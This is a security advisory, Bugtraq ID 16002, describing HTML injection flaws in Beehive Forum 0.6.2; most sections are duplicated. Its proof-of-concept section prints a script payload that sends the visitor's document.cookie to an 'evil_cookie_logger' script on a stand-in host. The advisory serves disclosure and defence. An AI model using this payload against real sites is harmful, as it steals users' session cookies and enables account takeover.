Beehive Forum Multiple HTML Injection Vulnerabilities
BID:16002
Info
Beehive Forum Multiple HTML Injection Vulnerabilities
| Bugtraq ID: | 16002 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 21 2005 12:00AM |
| Updated: | Dec 21 2005 12:00AM |
| Credit: | alireza hassani is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Beehive Forum Beehive Forum 0.6.2 |
| Not Vulnerable: | |
Discussion
Beehive Forum Multiple HTML Injection Vulnerabilities
Beehive Forum is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit these issues to control how the site is rendered to the user; other attacks are also possible.
Beehive Forum is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit these issues to control how the site is rendered to the user; other attacks are also possible.
Exploit / POC
Beehive Forum Multiple HTML Injection Vulnerabilities
No exploit is required.
An example has been provided:
<script>document.location.replace='http://www.example.com/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
No exploit is required.
An example has been provided:
<script>document.location.replace='http://www.example.com/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
Solution / Fix
Beehive Forum Multiple HTML Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Beehive Forum Multiple HTML Injection Vulnerabilities
References:
References: